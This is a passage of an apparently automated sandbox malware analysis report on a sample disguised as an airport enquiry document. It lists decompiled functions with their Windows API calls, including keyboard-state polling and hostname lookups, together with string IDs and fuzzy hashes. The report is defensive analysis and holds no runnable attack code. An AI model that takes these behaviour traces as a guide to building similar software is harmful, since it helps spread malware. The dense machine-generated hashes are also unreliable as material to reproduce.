            • Instruction Fuzzy Hash: 8341687550034A8BCF14EFA0D891BEE3724BF26354F244415EDA55B292DB30E91ADBB1
            Function 00CE5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
              • Part of subcall function 00C87A84: _memmove.LIBCMT ref: 00C87B0D
            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CE55D2
            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CE55E8
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE55F9
            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CE560B
            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CE561C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: SendString$_memmove
            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
            • API String ID: 2279737902-1007645807
            • Opcode ID: cfe4bee48e5f8c3930f1af19ce2053d16cf36a36427834afaa9db597e484382c
            • Instruction ID: 8ee2dddbd7d88b3e96e953aa3c5a4ed9938b5e67187a8d5e10c040f232e3de2e
            • Opcode Fuzzy Hash: cfe4bee48e5f8c3930f1af19ce2053d16cf36a36427834afaa9db597e484382c
            • Instruction Fuzzy Hash: EF11C4216501697DD720B7A6CC8ADFF7B7CEF91F08F500529B455A20D1EEA05E09CAB1
            Function 00CE48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
            • String ID: 0.0.0.0
            • API String ID: 208665112-3771769585
            • Opcode ID: 5ef01de0af7e3863347687ff264c51777fb5afa6324e3541a667645b2f1b996e
            • Instruction ID: 465ae345d0cc8d60c88c98b355ed76d5e1d50ca3c6e9aa0e65a86dfe6cbf2ceb
            • Opcode Fuzzy Hash: 5ef01de0af7e3863347687ff264c51777fb5afa6324e3541a667645b2f1b996e
            • Instruction Fuzzy Hash: 7A112731904225AFCB34EB65DC0AFDB77BCDF41714F1401B5F408E6192EF709A819661
            Function 00CE5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
            Download Yara Rule
            APIs
            • timeGetTime.WINMM ref: 00CE521C
              • Part of subcall function 00CA0719: timeGetTime.WINMM(?,75C0B400,00C90FF9), ref: 00CA071D
            • Sleep.KERNEL32(0000000A), ref: 00CE5248
            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00CE526C
            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CE528E
            • SetActiveWindow.USER32 ref: 00CE52AD
            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CE52BB
            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CE52DA
            • Sleep.KERNEL32(000000FA), ref: 00CE52E5
            • IsWindow.USER32 ref: 00CE52F1
            • EndDialog.USER32(00000000), ref: 00CE5302
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
            • String ID: BUTTON
            • API String ID: 1194449130-3405671355
            • Opcode ID: adff04a3f39f7a9e95bb21e54d7eea323692d0e4e95ef060e821ccd6a29a0567
            • Instruction ID: d5d40c2dbce962bec99c6c58b0bd1057cfc33eb9d86a308893ed38191736f198
            • Opcode Fuzzy Hash: adff04a3f39f7a9e95bb21e54d7eea323692d0e4e95ef060e821ccd6a29a0567
            • Instruction Fuzzy Hash: 1A21C374204B85AFE7205F31EC8CB2A3B69EB5638AF601434F105C67B1CBB19D409BB2
            Function 00CED7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • CoInitialize.OLE32(00000000), ref: 00CED855
            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CED8E8
            • SHGetDesktopFolder.SHELL32(?), ref: 00CED8FC
            • CoCreateInstance.OLE32(00D12D7C,00000000,00000001,00D3A89C,?), ref: 00CED948
            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CED9B7
            • CoTaskMemFree.OLE32(?,?), ref: 00CEDA0F
            • _memset.LIBCMT ref: 00CEDA4C
            • SHBrowseForFolderW.SHELL32(?), ref: 00CEDA88
            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CEDAAB
            • CoTaskMemFree.OLE32(00000000), ref: 00CEDAB2
            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CEDAE9
            • CoUninitialize.OLE32(00000001,00000000), ref: 00CEDAEB
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
            • String ID:
            • API String ID: 1246142700-0
            • Opcode ID: 1f530662af0b295f28c4de4fbcdb547524ccccf2aabe0cdda696faa7ecf7eb36
            • Instruction ID: 8680421db722bc31f55f70733af3d4261f8ecefbb538e8cd4871896e631a9fdf
            • Opcode Fuzzy Hash: 1f530662af0b295f28c4de4fbcdb547524ccccf2aabe0cdda696faa7ecf7eb36
            • Instruction Fuzzy Hash: BCB1F075A00109AFDB14DF65C888EAEBBF9FF48304B148469F90ADB251DB30EE45DB54
            Function 00CE052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
            Download Yara Rule
            APIs
            • GetKeyboardState.USER32(?), ref: 00CE05A7
            • SetKeyboardState.USER32(?), ref: 00CE0612
            • GetAsyncKeyState.USER32(000000A0), ref: 00CE0632
            • GetKeyState.USER32(000000A0), ref: 00CE0649
            • GetAsyncKeyState.USER32(000000A1), ref: 00CE0678
            • GetKeyState.USER32(000000A1), ref: 00CE0689
            • GetAsyncKeyState.USER32(00000011), ref: 00CE06B5
            • GetKeyState.USER32(00000011), ref: 00CE06C3
            • GetAsyncKeyState.USER32(00000012), ref: 00CE06EC
            • GetKeyState.USER32(00000012), ref: 00CE06FA
            • GetAsyncKeyState.USER32(0000005B), ref: 00CE0723
            • GetKeyState.USER32(0000005B), ref: 00CE0731
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: State$Async$Keyboard
            • String ID:
            • API String ID: 541375521-0
            • Opcode ID: ba4ddb60caa89161314f57c7fc2fa1de1a60566616eb3fa18a0787c0c83502dd
            • Instruction ID: a4b339371a7391254e3c0e95d0378f2b3e8680aac3b65121cc17973693136923
            • Opcode Fuzzy Hash: ba4ddb60caa89161314f57c7fc2fa1de1a60566616eb3fa18a0787c0c83502dd
            • Instruction Fuzzy Hash: 65510A30A047C819FB34DBA288547EABFB49F01380F184599D9D2561C2DAE49BCCCBA5
            Function 00CDC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
            Download Yara Rule
            APIs
            • GetDlgItem.USER32(?,00000001), ref: 00CDC746
            • GetWindowRect.USER32(00000000,?), ref: 00CDC758
            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CDC7B6
            • GetDlgItem.USER32(?,00000002), ref: 00CDC7C1
            • GetWindowRect.USER32(00000000,?), ref: 00CDC7D3
            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CDC827
            • GetDlgItem.USER32(?,000003E9), ref: 00CDC835
            • GetWindowRect.USER32(00000000,?), ref: 00CDC846
            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CDC889
            • GetDlgItem.USER32(?,000003EA), ref: 00CDC897
            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CDC8B4
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00CDC8C1
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ItemMoveRect$Invalidate
            • String ID:
            • API String ID: 3096461208-0
            • Opcode ID: 632cbfce981ad8ad7651e0972ad3a4017c0d9dc0fdab1147730069e77aee4c4f
            • Instruction ID: f84ce5f40721752c3e378609d716d03534e469dda14017423d61a0f08fa9d167
            • Opcode Fuzzy Hash: 632cbfce981ad8ad7651e0972ad3a4017c0d9dc0fdab1147730069e77aee4c4f
            • Instruction Fuzzy Hash: 58512171B00205ABDB18CF69DD85BAEBBBAEB88310F24812DF619D7390D7709E00CB50
            Function 00C8201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C82036,?,00000000,?,?,?,?,00C816CB,00000000,?), ref: 00C81B9A
            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C820D3
            • KillTimer.USER32(-00000001,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00C8216E
            • DestroyAcceleratorTable.USER32(00000000), ref: 00CBBEF6
            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00CBBF27
            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00CBBF3E
            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00CBBF5A
            • DeleteObject.GDI32(00000000), ref: 00CBBF6C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
            • String ID:
            • API String ID: 641708696-0
            • Opcode ID: 86e7416038bce96a956dbc994b1bc486a7fce38b81376a04c69c5aeb534d034c
            • Instruction ID: d9fccf48fa1c0b60be6b913a2017e4f8a916d642deeb0d63f6e639b6e88630cc
            • Opcode Fuzzy Hash: 86e7416038bce96a956dbc994b1bc486a7fce38b81376a04c69c5aeb534d034c
            • Instruction Fuzzy Hash: A6618738100710DFDB35AF55DD4CB6AB7F1FB4231AF208429E4528AAA0C771AD81DFA6
            Function 00C821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C825DB: GetWindowLongW.USER32(?,000000EB), ref: 00C825EC
            • GetSysColor.USER32(0000000F), ref: 00C821D3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ColorLongWindow
            • String ID:
            • API String ID: 259745315-0
            • Opcode ID: 5daf0324aea8d8b55543e7fc91e05e9761a83d0774cd65fcc94d89385c944896
            • Instruction ID: add69ddb5ef1ff2d7572363d545e9a50f4a3f67eb75804a8c5a40a3a1c0f3587
            • Opcode Fuzzy Hash: 5daf0324aea8d8b55543e7fc91e05e9761a83d0774cd65fcc94d89385c944896
            • Instruction Fuzzy Hash: 91418F31100240ABDB256F28EC8CBB93B65EB46335F244265FD758A2E6C7318D42DB65
            Function 00CEAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
            Download Yara Rule
            APIs
            • CharLowerBuffW.USER32(?,?,00D0F910), ref: 00CEAB76
            • GetDriveTypeW.KERNEL32(00000061,00D3A620,00000061), ref: 00CEAC40
            • _wcscpy.LIBCMT ref: 00CEAC6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharDriveLowerType_wcscpy
            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
            • API String ID: 2820617543-1000479233
            • Opcode ID: 067d64cbd89eef9cfef866056b28f1b72a9bb628e01ea3fe25192b046bb6cc4c
            • Instruction ID: a5822fb9dd8e5109055dd8180d2d35f3db03d7aff93dbedbb5eed86a7dbdf60e
            • Opcode Fuzzy Hash: 067d64cbd89eef9cfef866056b28f1b72a9bb628e01ea3fe25192b046bb6cc4c
            • Instruction Fuzzy Hash: F35191311083419FC714EF15C882AAEB7A5EF85708F64482DF496972A2DB31EE49DB53
            Function 00C89997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __i64tow__itow__swprintf
            • String ID: %.15g$0x%p$False$True
            • API String ID: 421087845-2263619337
            • Opcode ID: 8fd3e9172cb36414e5909583c541fd8f1bef8388332cb3a8149768ac3cc8717d
            • Instruction ID: 7863b7e2fa11f9b8650672b2955f908b5acf0e12e591043bed0282d5727e499b
            • Opcode Fuzzy Hash: 8fd3e9172cb36414e5909583c541fd8f1bef8388332cb3a8149768ac3cc8717d
            • Instruction Fuzzy Hash: 32412531A04205AFDB24EF79DC42EBAB3E8EB45318F24446EF55DD7281EA719902DB11
            Function 00D073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00D073D9
            • CreateMenu.USER32 ref: 00D073F4
            • SetMenu.USER32(?,00000000), ref: 00D07403
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D07490
            • IsMenu.USER32(?), ref: 00D074A6
            • CreatePopupMenu.USER32 ref: 00D074B0
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D074DD
            • DrawMenuBar.USER32 ref: 00D074E5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
            • String ID: 0$F
            • API String ID: 176399719-3044882817
            • Opcode ID: f0fe355cd0573f77632fc65325305535a88c1cf16e79a713335a393fc8b0d7b8
            • Instruction ID: 9c22bca13f4122e2f52c202d0df99e3f0ff29ce10f6a063990974fef5e94a100
            • Opcode Fuzzy Hash: f0fe355cd0573f77632fc65325305535a88c1cf16e79a713335a393fc8b0d7b8
            • Instruction Fuzzy Hash: 59410879A05305EFDB20DF65D888B9ABBB5FF49310F144029F9599B3A0D731E920DB60
            Function 00D0772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
            Download Yara Rule
            APIs
            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D077CD
            • CreateCompatibleDC.GDI32(00000000), ref: 00D077D4
            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D077E7
            • SelectObject.GDI32(00000000,00000000), ref: 00D077EF
            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D077FA
            • DeleteDC.GDI32(00000000), ref: 00D07803
            • GetWindowLongW.USER32(?,000000EC), ref: 00D0780D
            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00D07821
            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D0782D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
            • String ID: static
            • API String ID: 2559357485-2160076837
            • Opcode ID: 25002eaa57ac198876a762ad9db08b9c93b28b8be70948051a64fac42447fb66
            • Instruction ID: 07a59df0ad29bd47dc16827a523e9208234e167eb2f176002eff8783af0a832f
            • Opcode Fuzzy Hash: 25002eaa57ac198876a762ad9db08b9c93b28b8be70948051a64fac42447fb66
            • Instruction Fuzzy Hash: B9318C31504215ABDF229F64DC08FDA3B69FF49360F244225FA19E62E0C731E821DBB4
            Function 00CA7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CA707B
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            • __gmtime64_s.LIBCMT ref: 00CA7114
            • __gmtime64_s.LIBCMT ref: 00CA714A
            • __gmtime64_s.LIBCMT ref: 00CA7167
            • __allrem.LIBCMT ref: 00CA71BD
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA71D9
            • __allrem.LIBCMT ref: 00CA71F0
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA720E
            • __allrem.LIBCMT ref: 00CA7225
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA7243
            • __invoke_watson.LIBCMT ref: 00CA72B4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
            • String ID:
            • API String ID: 384356119-0
            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
            • Instruction ID: f55233fe1e4b026666f7e2134121a4681693b0adca9c92feef5b9cec31419416
            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
            • Instruction Fuzzy Hash: 3171C772A04717ABD7149E79CC41BAAB7A8FF16328F14433AF524E7681E770EE409790
            Function 00CE2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CE2A31
            • GetMenuItemInfoW.USER32(00D46890,000000FF,00000000,00000030), ref: 00CE2A92
            • SetMenuItemInfoW.USER32(00D46890,00000004,00000000,00000030), ref: 00CE2AC8
            • Sleep.KERNEL32(000001F4), ref: 00CE2ADA
            • GetMenuItemCount.USER32(?), ref: 00CE2B1E
            • GetMenuItemID.USER32(?,00000000), ref: 00CE2B3A
            • GetMenuItemID.USER32(?,-00000001), ref: 00CE2B64
            • GetMenuItemID.USER32(?,?), ref: 00CE2BA9
            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CE2BEF
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE2C03
            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE2C24
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
            • String ID:
            • API String ID: 4176008265-0
            • Opcode ID: 8fb715596b0f0b62256b1af78c595b65aa99f658d82c1d789a382c8384732fdf
            • Instruction ID: 5039f1eb1b30b4167ce483fae196a07f82f4ae0c3327866bd14c59cd023f4e9e
            • Opcode Fuzzy Hash: 8fb715596b0f0b62256b1af78c595b65aa99f658d82c1d789a382c8384732fdf
            • Instruction Fuzzy Hash: 156170B0900389AFEB21CF66CC88FAE7BBDFB41304F240569E85297251D771AE45DB21
            Function 00D07192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
